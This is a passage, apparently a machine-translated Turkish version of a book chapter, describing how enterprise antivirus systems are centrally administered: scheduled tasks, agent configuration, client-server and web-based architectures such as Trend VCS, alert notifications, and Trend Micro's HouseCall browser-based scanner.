  • belirli bir zamanda tek yürütme;
  • prosedürün anında tek seferde yürütülmesi

Planlanan prosedürlerin listesi

Modern antivirüs sistemlerinde programlanabilecek prosedürlerin bir listesi:

  • iş istasyonunun donanım ve yazılımının konfigürasyonu hakkında ayrıntılı bir raporun oluşturulması;
  • anti-virüs programının sürüm numarasının yanı sıra anti-virüs veritabanının oluşturulma tarihi ve sürüm numarasının belirlenmesi;
  • seçilen bilgisayara, bir kullanıcı grubu veya etki alanındaki bilgisayarlara bir anti-virüs programının yüklenmesi;
  • anti-virüs programlarının merkezi kurulumunun dağıtım dizininin içeriğinin güncellenmesi;
  • anti-virüs programlarının merkezi kurulumunun dağıtım dizinine giden yolu değiştirmek;
  • anti-virüs programını ve anti-virüs veritabanını güncellemek için kullanılan hesabın (tanımlayıcı/şifre) değiştirilmesi;
  • anti-virüs programlarını yeni bilgisayarlara otomatik olarak yüklemek için ağ yapılandırmasındaki değişikliklerin tespiti (yeni veya güncellenmiş iş istasyonlarını arayın);
  • anti-virüs programlarının merkezi kurulumunun ana dağıtım dizininin diğer dizinlere kopyalanması (örneğin, şirket şubelerinde kurulu sunucularda bulunur). Bu prosedür, anti-virüs programlarının merkezi kurulumu için tasarlanmış birkaç sunucuya yeni veya güncellenmiş bir dağıtım kiti dağıtmak için kullanılır.

Kontrol sistemi, işin başlamasından önce ve yürütüldükten sonra işletim sisteminin keyfi komutlarının yürütülmesini belirlemenizi sağlar.

Bir iş çöktüğünde gerçekleştirilecek eylemleri de tanımlayabilirsiniz. Örneğin, herhangi bir nedenle başarıyla tamamlanamayan bir virüsten koruma programının kurulumunu tekrarlayabilirsiniz.

Bir işi başlatma ve durdurma

Yönetici istediği zaman yönetim konsolunu kullanarak belirtilen prosedürü başlatabilir veya durdurabilir.

Görev düzenleme

Hazırlanmış ancak henüz başlamamış bir iş düzenlenebilir. Aynı zamanda yönetici, çalışan görevin zamanlamasını, görevin türünü ve görevin diğer özelliklerini değiştirebilir.

Bir İşi Silme

İş yürütme veya çalıştırma için kuyruğa alınmışsa, yönetici onu silebilir. Çalışan iş daha sonra durdurulur.

Görev yürütme kontrolü

Zamanlanmış bir göreve genellikle bir ad ve bir tür verilir. Tür, gerçekleştirilecek eylemi belirler ve ad, yönetici tarafından işin sonucunu izlemek için kullanılır. Bu tür izleme, gerçek zamanlı olarak sürekli olarak gerçekleştirilebilir.

Gelişmiş sıralama araçları, yalnızca gerekli görev gruplarını izlemenize olanak tanır, örneğin:

  • belirli bir türdeki görevler;
  • seçilen iş istasyonlarında çalışan işler;
  • bir kullanıcı grubunun iş istasyonlarında çalışan işler;
  • seçilen etki alanındaki iş istasyonlarında çalışan işler

Görev yürütmenin sonuçları günlüğe kaydedilir.

İş Seçenekleri

Yönetici, uzaktan yönetim ve kontrol konsolunu kullanarak zamanlanmış görevler için çeşitli parametreler ayarlayabilir.

Ortak parametreler

Genel iş seçeneklerini aşağıda listeledik:

  • iş adı;
  • görevin sonuçlarını günlüğe kaydetmek için dosya adı;
  • görevin tamamlanmasından önce ve sonra yürütülecek komutlar;
  • iş kalıcılığı bayrağı. Kalıcı işler, geçici işlerin aksine, yönetim konsolu yeniden başlatıldığında geri yüklenir;
  • belirtilen grubun tüm bilgisayarları için görevi yürütmek için onay kutusu;
  • başarısız olursa işi otomatik olarak yeniden denemek için onay kutusu

Hedef parametreler

Bu ayarlar, işin çalıştırıldığı iş istasyonlarını, kullanıcı gruplarını ve etki alanlarını tanımlar. Aslında, bu yalnızca yönetici tarafından oluşturulan bilgisayarların, kullanıcı gruplarının veya etki alanlarının bir listesidir.

Ek kurulum seçenekleri

Bu grup, kurulu virüsten koruma kopyaları için ağı taramakla ilgili virüsten koruma programlarını yükleme ayarlarını etkileyen ayarları içerir. Kurulumun yalnızca şu iş istasyonlarında gerçekleştirilmesi gerektiğini belirtebilirsiniz:

  • antivirüsün kurulu bir kopyasını içermez;
  • antivirüsün eski bir kopyasını içerir;
  • antivirüsün kurulu bir kopyasını içermez veya antivirüsün güncel olmayan bir kopyasını içerir

Anti-virüs programlarının önceden güncellenmiş kopyalarının zorunlu olarak yeniden güncellenmesi mümkündür.

Antivirüs yapılandırma seçenekleri

Bu seçenekleri kullanarak, virüsten koruma uygulaması için bir yapılandırma ayarları şablonu içeren bir dosya belirleyebilirsiniz. Ayrıca bu tür her şablon için bir ad belirleyebilirsiniz.

Şablonların, farklı iş istasyonları, kullanıcı grupları veya etki alanları için farklı virüsten koruma programı ayarlarını kaydetmenize izin verdiğini hatırlayın.

Ana merkezi kurulum dizininin konumu

Bu ayar grubu, anti-virüs uygulamalarının merkezi kurulumu için ana dizinin fiziksel konumunu tanımlar. Bu dizin, örneğin şirketin şubelerinin uzak sunucularının disklerinde bulunan diğer dizinlere çoğaltılabilir.

İş istasyonlarına antivirüs yüklemek için dizinin konumu

Yönetici, anti-virüs programının kurulacağı iş istasyonu dizininin yolunu belirleyebilir.

Varsayılan dizin veya bu yapılandırmaya özel bir dizin seçilebilir.

Antivirüs yükleme ve güncelleme hesabı

Bu parametre seti, iş istasyonunun virüsten koruma programını ve virüsten koruma veritabanını güncellemek için kullanacağı bir hesap (tanımlayıcı, parola ve etki alanı) belirlemenize olanak tanır. Bu hesabın yönetici ayrıcalıklarına sahip olması gerekmez.

Mevcut merkezi kurulum dizinini değiştirme seçenekleri

Bu seçenekler, aynı anda farklı virüsten koruma programlarının birkaç dağıtımını içeren kayıtlı bir paylaşılan merkezi kurulum dizini veya her bir virüsten koruma programı için ayrı rastgele dizinler oluşturmanıza olanak tanır.

Merkezi kurulum dizini çoğaltma ayarları

Bu seçenekler, çoğaltmayla ilgili dizinleri ve çoğaltmadan önce eski dağıtım dosyalarının silinip silinmeyeceğini seçmenize olanak tanır.

Ayrıca, yalnızca virüsten koruma veritabanı dosyalarının ve en önemli program dosyalarının çoğaltıldığı kısmi çoğaltma modunu da ayarlayabilirsiniz. Bu mod özellikle replikasyonun yavaş iletişim kanalları (örneğin modem) üzerinden gerçekleştirildiği durumlarda kullanışlıdır.

Yeni bilgisayarları algılamak için ağ tarama seçenekleri

Bu taramalar, virüsten koruma programlarını yeni bilgisayarlara otomatik olarak yüklemek için gerçekleştirilir.

Bu ayarlar, taranacak bilgisayar gruplarını ve etki alanlarını tanımlamanıza olanak tanır.

Rapor Seçenekleri

Bu seçenekler, raporun kaydedileceği dosyanın adını ve rapor oluşturulduktan sonra yürütülecek komutu belirtmenize olanak tanır. Bu komut, örneğin, oluşturulan raporu Microsoft Excel'e yükleyebilir.

3. Kontrol ve yönetim programının parametreleri

Klasik kontrol ve yönetim sistemleri, yöneticinin iş istasyonunda çalışan bir kontrol programından ve iş istasyonları ve ağ sunucularında çalışan ajan programlarından oluşur.

Kontrol ve yönetim programının parametreleri, programın kendisinin ve aracıların çalışma modlarını etkiler. Yönetici, bu ayarları değiştirerek, konsolun aracılarla iletişim kurmak için kullandığı istenen ağ protokolünü seçebilir ve seçilen ağ protokolünün parametrelerini yapılandırabilir.

İzleme ve kontrol programını yapılandırma

Bu seçenekler şunları ayarlamanıza olanak tanır:

  • tüm ağ bilgisayarlarının listesini görüntüleme modu (otomatik veya açık istekle);
  • ağın durumu hakkındaki bilgileri güncellemek için yürütme iş parçacığı sayısı (iş parçacığı);
  • uzak bilgisayarlardan veri çıkarma girişimlerinin sayısı (iletişim kanallarının kararsız çalışması durumunda gereklidir);
  • şirket ağındaki tüm bilgisayarlarda anti-virüs korumasının çalışmasıyla ilgili olayları depolayan merkezi günlük dosyasının konumu;
  • anti-virüs korumasını yönetmek için kullanılan yönetici hesaplarının ayarları (tanımlayıcı, parola, etki alanı vb.).

Aracıları Yapılandırma

Aracı programları iş istasyonlarında başlatılır ve kontrol programı ile etkileşime girer. Aracılar için aşağıdaki ayarlar yapılandırılır:

  • kontrol programıyla etkileşim için kullanılan ağ protokolü (TCP/IP, IPX/SPX, TCP üzerinden NetBIOS, IPX üzerinden NetBIOS, Adlandırılmış borular, vb.);
  • bitiş noktası (bitiş noktası);
  • Port numarası

4. Kurumsal anti-virüs koruma sistemlerinin mimarisi ve çalışma prensipleri

Anti-virüs koruması için kontrol ve izleme sistemlerinin amaç ve işlevlerini göz önünde bulundurarak, modern kurumsal anti-virüslerde kullanılan mimari çözümlerin bir incelemesine geçelim. Bunlar klasik istemci-sunucu mimarilerinin yanı sıra Web teknolojilerinin kullanımını içeren çok seviyeli mimarilerdir.

İstemci-sunucu sistemleri

İstemci-sunucu mimarisi kullanılırken, yönetim ve kontrol sisteminin temeli, kurumsal ağ sunucularından birine kurulu bir anti-virüs sunucusudur. Bir yandan ağ iş istasyonlarında anti-virüslerle birlikte kurulan ajan programlarıyla ve diğer yandan anti-virüs koruma yöneticisinin yönetim konsolu ile etkileşime girer (Şekil 4-1).

Pirinç. 4-1. Yönetici konsolu, aracılar ve virüsten koruma sunucusu arasındaki etkileşim

Anti-virüs sunucusu, eylemleri yönetme ve koordine etme işlemlerini gerçekleştirir. Özellikle, virüsten korumayla ilgili ve ağdaki tüm bilgisayarlarda meydana gelen olayların genel bir günlüğünü, ayrıca bir liste ve görev çizelgesini depolar. Virüsten koruma sunucusu, aracılardan gelen mesajları almaktan ve bunları ağda belirli olayların meydana gelmesiyle ilgili virüsten koruma yöneticisine göndermekten sorumludur, yeni iş istasyonlarını veya değiştirilmiş bir anti- virüs yapılandırması vb.

Aracılara ek olarak, her iş istasyonuna ve dosyaları tarayan ve açıldıklarında dosyaları kontrol eden (tarayıcı ve virüsten koruma izleme işlevleri) kurumsal ağ sunucusuna bir virüsten koruma yazılımı yüklenir. Virüsten koruma işleminin sonuçları, aracılar aracılığıyla onları analiz eden ve genel olay günlüğüne kaydeden virüsten koruma sunucusuna iletilir.

Yöneticinin yönetim konsolu, tüm anti-virüs koruma sistemini yönetme ve çalışmasını izleme yeteneği sağlar. Aracılar aracılığıyla virüsten koruma sunucusuyla ve ağdaki tüm bilgisayarlarda yüklü olan virüsten koruma yazılımlarıyla etkileşime girer.

Bu yönetim konsolu, bir pencere arabirimine sahip standart bir Microsoft Windows uygulaması veya Microsoft Windows işletim sisteminin Denetim Masası yönetim konsolunun bir uygulaması (ek bileşeni) olabilir. İlk yaklaşım, örneğin Sophos antivirüs yönetim sisteminde ve ikincisi - Norton AntiVirus yönetim sisteminde uygulanır.

Yönetim konsolunun kullanıcı arabirimi, şirket ağının ağaç yapısını görüntülemenize, gerekirse belirli kullanıcı gruplarının veya etki alanlarının bireysel bilgisayarlarına erişmenize olanak tanır (Şekil 4-2).

Pirinç. 4-2. Anti-virüs koruması yöneticisinin yönetim konsolu

Bir şirket ağı, yüzlerce etki alanında binlerce bilgisayarla çok kapsamlı olabileceğinden, konsolun yalnızca bir ağ ağacı görünümü değil, aynı zamanda iş istasyonlarını ad, kullanıcı çalışma grubu veya etki alanına göre doğrudan aramak için bir araç sağlaması gerekir.

Kullanıcı arayüzü öğelerinin geri kalanına gelince, burada standart veya özel olarak tasarlanmış kontrollere sahip sıradan iletişim kutuları kullanılır - düğmeler, listeler, onay kutuları, metin giriş alanları vb.

İlk kurulum süreci

Anti-virüs koruma yöneticisi, anti-virüs koruma sisteminin kurulumu, güncellenmesi ve çalıştırılması ile ilgili diğer tüm işlemlerin gerçekleştirildiği uzaktan kontrol ve izleme konsolu için kurulum programını başlatır. Özellikle, koordinasyon ve kontrol işlevlerini yerine getiren kurumsal ağ sunucularından birine bir virüsten koruma sunucusu kurulur.

Küçük ağlarda yönetici, yerel ağ sunucusunda merkezi bir virüsten koruma yükleme dizini oluşturmak için konsolu kullanabilir ve ardından tüm ağ iş istasyonlarında ve sunucularda virüsten koruma yükleme işlemini başlatabilir (veya gecikmeli başlatma için bir görev hazırlayabilir).

Uzak şubeleri olan daha büyük şirket ağlarında, yönetici birden çok merkezi kurulum dizini (örneğin, her uzak ağ için bir dizin) oluşturmak için konsolu kullanır. Ardından, yönetici tüm ağ iş istasyonlarına antivirüs yüklemek için görevler hazırlar. Kurulum, her uzak şubede kendi merkezi kurulum dizininden gerçekleştirilir, bu da şubeler arasındaki ağ trafiğini azaltır. Kurulum süresini azaltmak için antivirüs tüm iş istasyonlarına aynı anda yüklenir.

Virüsten koruma ve virüsten koruma veritabanını güncelleme

Bu işlem, anti-virüs koruma yöneticisi tarafından iş istasyonundan yönetim ve kontrol konsolu kullanılarak gerçekleştirilir.

Birden çok merkezi yükleme dizini oluşturulmuşsa, yönetici bunların çoğaltmasını yapılandırır. Virüsten koruma programı modüllerini veya virüsten koruma veritabanını güncellemek gerekirse, yönetici merkezi kurulumun ana dizini olan yalnızca birinin içeriğini günceller. Çoğaltılan dizinlerin içeriği, önceden tanımlanmış bir programa göre otomatik olarak güncellenir.

Kurumsal ağ İnternet'e bağlıysa, merkezi kurulumun ana dizininin içeriğinin, yönetici tarafından belirlenen bir programa göre virüsten koruma şirketinin sitesinden otomatik olarak güncellenebileceğini unutmayın. Böyle bir bağlantı sağlanmazsa, yöneticinin merkezi kurulum ana dizinini manuel olarak güncellemesi gerekir.

Anti-virüs programlarının çalışmasını yönetme

Anti-virüs koruma yöneticisi, merkezi yönetim ve kontrol konsolunu kullanarak, iş istasyonlarına ve sunuculara yüklenen anti-virüslerin çalışma modlarını iş istasyonundan uzaktan yapılandırabilir ve ayrıca anti-virüs koruma sistemi hizmet hizmetlerinin çalışma modlarını belirleyebilir.

Konsol, bir veya daha fazla kurumsal etki alanında önceden tanımlanmış hesapları kullanarak, ağdaki tüm bilgisayarlarda çalışan bir aracıya bağlanabilir. Yönetici, standart pencere arabirimini kullanarak, seçilen bilgisayarlara, seçilen kullanıcı gruplarına veya seçilen etki alanlarına yüklenen virüsten koruma programlarının tüm ayarlarını değiştirebilir. Parametrelerdeki değişiklikler hemen yapılabilir veya belirli bir zamanda başlayan bir görev olarak sunulabilir.

Ayrıca yönetici, iş istasyonları ve sunucuların dizinlerini tarayarak gerçekleştirilen virüsten koruma denetimleri için bir zamanlama ayarlayabilir.

Anti-virüs korumasının çalışması hakkında bilgi toplama ve görüntüleme

Uzaktan kontrol ve izleme sistemi, anti-virüs korumasının çalışmasıyla ilgili bilgilerin toplanmasını, günlüğe kaydedilmesini ve görüntülenmesini sağlar. Kurumsal ağ sunucularından birine (bu sunucu yönetici tarafından seçilir) kurulu anti-virüs koruma sisteminin sunucu modülü, bilgilerin merkezi olarak toplanmasından sorumludur.

Toplanan tüm bilgiler, anti-virüs koruma yöneticisinin iş istasyonundaki kontrol programı konsolu aracılığıyla kullanılabilir hale gelir.

Şek. 4-3 İş istasyonlarında ve ağ sunucularında kurulu anti-virüs programlarının yerel günlüklerinden, anti-virüs sunucusunda bulunan genel günlüğe bilgi aktarma işlemini gösterdik. Ayrıca, anti-virüs koruması yöneticisinin konsolu kullanarak iş istasyonundan genel günlüğü görüntüleyebileceğini gösterir.

Pirinç. 4-3. Anti-virüs koruması yöneticisinin yönetim konsolu

Aşağıdaki bilgiler toplanmaya ve kaydedilmeye tabidir:

  • anti-virüs program modüllerinin kurulum/güncelleme tarihi ve saati, bu modüllerin sürümünü belirten;
  • anti-virüs veritabanının güncellenme tarihi ve saati, sürümünü belirten;
  • iş istasyonlarında ve ağ sunucularında kurulu işletim sistemi sürümü, işlemci türü, işletim sistemi sistem dizinlerinin konumu vb. hakkında bilgiler;
  • iş istasyonlarında ve ağ sunucularında kurulu anti-virüs sürümü hakkında bilgi;
  • antivirüs ve antivirüs veritabanını kurmak veya güncellemek için merkezi kurulum dizinine erişmek için iş istasyonunda kullanılan hesaplar hakkında bilgi;
  • antivirüs ve antivirüs veritabanını kurmak veya güncellemek için kullanılan merkezi kurulum dizininin konumu hakkında bilgi;
  • iş istasyonlarında ve ağ sunucularında bulunan yerel günlük dosyalarının tam yolu ve içerikleri hakkında bilgi;
  • anti-virüs ve anti-virüs veritabanını kurarken, güncellerken ve ayrıca anti-virüsün çalışması hakkında bilgi alırken, yönetim konsolu tarafından iş istasyonlarının ve ağ sunucularının kaynaklarına erişmek için kullanılan hesaplar hakkında bilgi;
  • antivirüs yapılandırması ve çalışma modları (sezgisel yöntemlerin kullanımı, taranan dosya türlerinin listesi, virüs algılandığında yapılacak işlemler vb.);
  • tespit edilen virüsün adı, tespit tarihi, yapılan işlemler, tedavinin sonucu vb. gibi antivirüsün çalışmasıyla ilgili bilgiler.

Alınan bilgiler, anti-virüs koruma sisteminin çalışması hakkında merkezi bilgi toplamadan sorumlu sunucunun sistem günlüğüne yazılır.

Yönetici, yönetim konsolunu kullanarak, gerekirse bunları Microsoft Excel formatına dönüştürerek çeşitli tablo raporları alabilir. Bunlar, örneğin aşağıdaki gibi raporlar olabilir:

  • antivirüs ve antivirüs veritabanlarının kurulumu veya güncellenmesi hakkında raporlar;
  • seçilen iş istasyonlarında, kullanıcı gruplarının ve etki alanlarının iş istasyonlarında virüs algılamaları hakkında raporlar;
  • belirli virüslerin yayılma zamanını ve yönünü takip etmenizi sağlayan raporlar;
  • anti-virüs sisteminin çalışmasını yönetmek için tasarlanmış hesapların kullanımına ilişkin raporlar;
  • anti-virüs sisteminin ayarlarındaki ve çalışma modlarındaki değişiklikler hakkında raporlar

Sinyal bilgilendirme

Virüsten koruma programı, bir görevin parçası olarak gerçekleştirilen veya virüsten koruma monitörü tarafından başlatılan bir tarama sırasında kullanıcının iş istasyonunda virüslü bir dosya bulduğunda, kullanıcıyı bilgilendirir (iş istasyonunun ekranında bir mesaj görüntüleyerek) ve anti-virüs sunucusu.

Ardından, anti-virüs sunucusu, anti-virüs koruma sisteminin kurulumu sırasında belirtilen ayarlara uygun olarak olayın meydana geldiği konusunda koruma yöneticisini ve diğer kişileri bilgilendirir. Bu durumda, anti-virüs sunucusu şirket ağı ve (yönetici tarafından belirtilmişse) çağrı ağı, e-posta veya SMS ağı aracılığıyla bir mesaj gönderir (Şek. 4-4).

Ayrıca, anti-virüs sunucusunda bulunan ana günlüğe bir olayın meydana geldiğine dair bir mesaj yazılır.

Yönetim konsolunun yardımıyla, anti-virüs koruma yöneticisi, meydana gelmesi kullanıcılara ve yöneticilere acilen bildirilmesi gereken olayların listesini tanımlayabilir. Bunlar, örneğin, aşağıdaki gibi olaylar olabilir:

  • virüs tespiti;
  • anti-virüs veya anti-virüs veritabanlarının yazılım modüllerini başarıyla güncelleyememe;
  • anti-virüs koruma yazılımının çalışmasındaki hatalar (özellikle anti-virüs korumasının acil olarak kapanmasına yol açabilecek olanlar);
  • yerel olay günlüğünün taşması veya başka nedenlerle yerel olayların günlük kaydının imkansızlığı;
  • Antivirüslerin yapılandırmalarında ve çalışma modlarında, koruma düzeyini veya güvenilirliğini potansiyel olarak azaltan değişiklikler.

Yönetici tarafından yapılan ayarlara bağlı olarak bu tür olayların meydana geldiğine dair bir mesaj iletilebilir.

  • iş istasyonunda bir olay meydana gelen kullanıcı (örneğin, bir virüs algılandı);
  • ağın çalışmasından veya anti-virüs korumasının çalışmasından sorumlu bir veya daha fazla yönetici;
  • listesi yönetici tarafından önceden belirlenmiş şirket başkanı veya diğer kişiler.

Pirinç. 4-4. Bir iş istasyonuna virüs bulaşması hakkında bir mesaj gönderme

Mesaj, hem işletim sisteminin standart yayın araçlarıyla (bu şekilde iletilen bir mesajın metni, alıcının ekranında küçük bir iletişim kutusunda görünür) hem de aşağıda listelenen ek yollarla iletilir:

  • SMTP protokolünü kullanarak e-posta yoluyla;
  • MHS posta hizmeti aracılığıyla (NetWare ağlarında);
  • Alfanümerik Giriş Protokolü (IXO/TAP) veya dijital çağrı cihazları kullanan bir veya daha fazla alfanümerik çağrı cihazına;
  • SMS kısa mesaj sistemi aracılığıyla.

Komut ve kontrol konsolu programı, olaylara çeşitli mesajlar atamanıza izin verir. Böylece yönetici mesaj metinlerini kendisi tanımlayabilir.

Bir çağrı cihazına mesaj göndermek veya SMS mesajları göndermek için, anti-virüs sisteminin bir modem aracılığıyla otomatik modda çalışan ilgili hizmetle iletişim kurduğunu unutmayın. Bu hizmetler her yerde mevcut değildir, bu nedenle e-posta yoluyla mesaj göndermek, SMS yoluyla bir çağrı cihazına veya cep telefonuna mesaj göndermekten daha çok yönlüdür.

Çağrı servislerine veya otomatik SMS mesajlaşma servislerine mesaj göndermek için bir modem gereklidir. Bu modem, anti-virüs korumasının çalışması hakkında bilgi toplama ve işleme merkezi rolü oynayan bir sunucuya veya şirket ağındaki başka herhangi bir bilgisayara bağlanabilir. Mesajlaşma sistemini yapılandırırken, yönetici modemin hangi bilgisayara bağlı olduğunu belirtmelidir.

SMTP e-posta yoluyla mesaj göndermek için kurumsal bir posta sunucusunu veya bir İnternet Servis Sağlayıcısı tarafından barındırılan bir sunucuyu kullanabilirsiniz. Yerel ağ bir modem kullanılarak İnternete bağlıysa, anti-virüs yönetim ve kontrol sistemi, mesaj göndermek için operatör müdahalesi olmadan kendi kendine bir bağlantı kurar.

İnternette e-posta mesajlarının bir çağrı cihazına veya cep telefonuna (SMS mesajı olarak) iletilmesine izin veren çeşitli ağ geçitleri de vardır. Bununla birlikte, bu tür tüm Rus ağ geçitlerinin deneysel bir modda çalıştığına dikkat edilmelidir, bu nedenle güvenilir çalışmaları garanti edilmez.

Bir e-posta mesajının ağ geçidi ve SMS ağı üzerinden bir cep telefonuna geçişi için gereken süreye gelince, pratik testler Moskova'da bunun birkaç saniye ile birkaç saat arasında değiştiğini göstermiştir.

Web arayüzüne sahip çok seviyeli sistemler

Web arayüzüne sahip çok seviyeli sistemlerin mimarisi, sistemin çekirdeği olarak bir Web sunucusunun kullanılmasını içerir. Bu çekirdeğin görevi, bir yandan kullanıcıyla ve diğer yandan belirli bir sistemin yazılım modülleriyle etkileşimli etkileşimli etkileşimin organizasyonudur.

Bugün Web teknolojilerinin, kurumsal sunucu ekipmanını izleme ve teşhis etme, e-posta sunucularını ve İnternet'e veya kurumsal intranetlere bağlı diğer cihazları ve sistemleri yönetme gibi idari görevleri çözmek için yaygın olarak kullanıldığını unutmayın.

Ortak bir tarayıcı kullanarak, bir sistem yöneticisi veya mühendislik personeli, örneğin, Compaq'ın sunucu donanımının çalışması hakkında kapsamlı tanılama bilgileri elde edebilir. Bu, hata günlükleri, olası donanım arızaları hakkındaki mesajlar, CPU sıcaklıkları, kasa ve güç kaynakları içindeki sıcaklıklar, fan hızları vb. gibi bilgileri içerir.

Bu yaklaşımın avantajları, çeşitli ağ sistemlerini yönetme yöntemlerinin birleştirilmesinin yanı sıra yöneticinin iş istasyonuna herhangi bir kontrol programı veya konsol yükleme ihtiyacının olmamasıdır. Ek olarak, yönetim herhangi bir ağ bilgisayarından ve ağ İnternet'e bağlıysa, o zaman dünya üzerinde İnternet bağlantısı olan herhangi bir yerden ve tarayıcılı bir bilgisayardan yapılabilir.

SSH protokolleri veya diğer benzer araçlar (örneğin, HTTP protokolünün yerel güvenli değişiklikleri), İnternet veya kurumsal intranet üzerinden iletildiğinde kontrol bilgilerini korumak için kullanılır.

Trend Virüs Kontrol Sistemi Mimarisi

Web teknolojileri temelinde oluşturulan Trend Virüs Kontrol Sisteminin mimarisini düşünün. Bu sistem, bireysel ağ parçaları farklı ülkelerde veya farklı kıtalarda bulunsa bile, kurumsal anti-virüs koruma sisteminin çalışmasını bir tarayıcı aracılığıyla bir iş istasyonundan tam olarak yönetmenizi ve kontrol etmenizi sağlar.

Bir Web sunucusu, genellikle Microsoft Internet Information Server sürüm 4.0 veya 5.0, kurumsal ağ sunucularından birine kurulur. Bu sunucu, Microsoft Windows 2000 Server işletim sisteminin bir parçasıdır ve Windows NT için ücretsiz Microsoft Option Pack'ten Microsoft Windows NT sürüm 4.0 işletim sistemine kurulabilir.

Bu Web sunucusunda çalışan özel bir sunucu Web uygulaması Trend VCS Sunucusu, anti-virüs sisteminin kontrol ve izleme modülünün yanı sıra, kendi kullanıcı arayüzüne sahip olmayan tüm ağ bilgisayarlarında kurulu yazılım aracılarıyla etkileşime girer.

Etkileşim, Trend Micro tarafından geliştirilen güvenli HTTP protokolü kullanılarak gerçekleştirilir. Ayrıca, IIS sunucusuna ve Trend VCS Sunucusuna erişimi kısıtlamak için parola koruması kullanılır.

Şek. 4-5 Web arayüzüne sahip bir anti-virüs koruma sisteminin blok şemasını gösterdik.

Pirinç. 4-5. Web arayüzü ile anti-virüs sistemi

Bu devre, Şekil 1'de gösterilen devreye benzer. 4-1, ancak, anti-virüs koruma yöneticisi, çalışmasını konsol uygulaması aracılığıyla değil tarayıcı aracılığıyla yönetir.

İş istasyonlarında bir antivirüs (PC-cillin, Server Protect, InterScan VirusWall, ScanMail, vb.) kuruludur. Bu virüsten koruma, virüsten koruma sunucusu tarafından bir aracı aracılığıyla yönetilir.

Microsoft Internet Information Server Web sunucusu, bir anti-virüs sunucusu olarak görev yapan bilgisayara yüklenir. Bu sunucu üzerinde çalışan özel bir Web uygulaması, anti-virüs sunucusunu yönetir. Ayrıca, yöneticiye anti-virüs koruma sistemini yönetmesi için bir kullanıcı arabirimi sağlar.

Tarayıcı aracılığıyla gerçekleştirilen anti-virüs koruma yöneticisinin talebi üzerine, bu uygulama aşağıdaki gibi işlemlerin yürütülmesini başlatır:

  • merkezi kurulum dizinleri oluşturun;
  • merkezi bir kurulumun dizinlerini çoğaltmak için görevlerin hazırlanması ve çalıştırılması;
  • anti-virüs yazılım modüllerinin ve anti-virüs veritabanlarının kurulumu için görevlerin hazırlanması ve başlatılması;
  • iş istasyonlarında ve kurumsal ağ sunucularında kurulu anti-virüs programlarının çalışma modlarının yapılandırılması;
  • anti-virüs koruma sisteminin işleyişini yansıtan çeşitli günlük ve raporların görüntülenmesi ve bu raporlarla ilgili bilgi taleplerinin yerine getirilmesi;
  • tüm ağ bilgisayarlarında kurulu işletim sistemlerinin, anti-virüs programlarının ve anti-virüs veritabanlarının sürüm kontrolü.

Böylece, şirket ağı üzerinde herhangi bir yere kurulu olan tüm anti-virüs araçlarını yönetmek için yönetici bir tarayıcı kullanabilir.

Bu tarayıcı ağdaki herhangi bir bilgisayarda çalıştırılabilir, bu nedenle herhangi bir yönetim uygulaması veya uygulaması yüklemeye gerek yoktur. Bu, yalnızca yöneticinin iş istasyonundan değil, aynı zamanda diğer herhangi bir ağ iş istasyonundan da gerçekleştirilebildiğinden, virüsten koruma araçlarının çalışmasını yönetme görevini basitleştirir. Örneğin, şirketin şubelerinden birinde bir iş gezisinde olan yönetici, merkez ofisteki masasında oturuyormuş gibi anti-virüs koruma sisteminin çalışmasını tam olarak kontrol edebilir.

Trend VCS Sunucu ve istemci uygulaması, bilgisayar platformlarından olabildiğince bağımsız olması için Java programlama dili ve web uygulamaları geliştirmek için kullanılan diğer dillerde yazılmıştır.

Kurumsal anti-virüs koruma sisteminde olayların meydana gelmesiyle ilgili bildirimlere gelince, bu tür bildirimler aracı programlar tarafından Trend VCS Sunucusuna iletilir ve e-posta, çağrı ağları, SMS sistemleri vb. aracılığıyla gönderilir.

Ev Çağrı sistemi

Trend Micro, iş istasyonlarında çalışan virüsten koruma programlarını kullanan klasik virüsten koruma korumasına ek olarak, özel olarak tasarlanmış bir virüsten koruma ActiveX denetimi kullanarak dosyaları virüslere karşı tarama teknolojisi sunar.

Bu ActiveX denetimi, kurumsal bir Web sunucusunda bulunur ve bir tarayıcı aracılığıyla erişilebilir. Bir kullanıcı, iş istasyonunda bulunan dosya veya dizinlerin virüsten koruma taramasını başlatmak istediğinde, bir tarayıcı kullanarak kurumsal Web sunucusunun ilgili sayfasını açar. Bu, anti-virüs ActiveX denetimini otomatik olarak kullanıcının iş istasyonunun belleğine yükler.

İndirme işlemi tamamlandıktan sonra, kullanıcı, geleneksel bir virüsten koruma programınınkine benzer bir kullanıcı arabirimi ile bir tarayıcı penceresi aracılığıyla virüsten koruma ActiveX denetimiyle etkileşime girebilir (Şekil 4-6).

HouseCall sistemini kullanmak çok basittir. Ağaç benzeri dizin listesini kullanarak, uygun onay kutularını işaretleyerek taranacak dizinleri ve dosyaları seçmeniz gerekir. Ardından, tarama işlemi başlayacak olan SCAN düğmesine tıklayın. Ayrıca Otomatik Temizleme kutusunu işaretlerseniz, program virüs gövdesini virüslü dosyalardan kaldırmaya çalışır.

Tarama sonuçları ayrı bir pencerede görünecektir. Kullanıcıdan virüs bulaşmış dosyalardan virüs gövdesini kaldırmaya veya virüslü dosyaları silmeye çalışması istenir.

Pirinç. 4-6. HouseCall antivirüs sistemi

Bu yaklaşımın avantajları, kullanıcının iş istasyonuna bir virüsten koruma programı yükleme ihtiyacının olmamasını içerir. Bir kullanıcının bir dosyayı kontrol etmesi gerektiğinde, sadece bir tarayıcı başlatır, kurumsal Web sitesinin istenen sayfasını ona yükler ve taramaya başlar.

Dezavantajlara gelince, bu teknoloji, tüm dosyaları erişildiklerinde kontrol eden bir anti-virüs monitörünün varlığı anlamına gelmez. Bu nedenle, bizce sadece ek olarak kabul edilebilir.

HouseCall sistemi, çalışma prensibinde, DialogScience sunucusunda oluşturulan anti-virüs kontrol sisteminden temel olarak farklıdır. HouseCall sistemi, dosyaları tek tek sunucuya aktarmak ve bir antivirüs ile kontrol etmek yerine, kullanıcının bilgisayarına ActiveX denetimi şeklinde yapılmış bir antivirüs modülü yükler. Trend Micro sunucusundan indirildikten sonra bu modül, istek üzerine kullanıcının bilgisayarında depolanan tüm dosyaları tarayabilir. Bu dosyalar internet üzerinden aktarılmaz, yerel olarak incelenir, bu nedenle işlem çok zaman almaz.


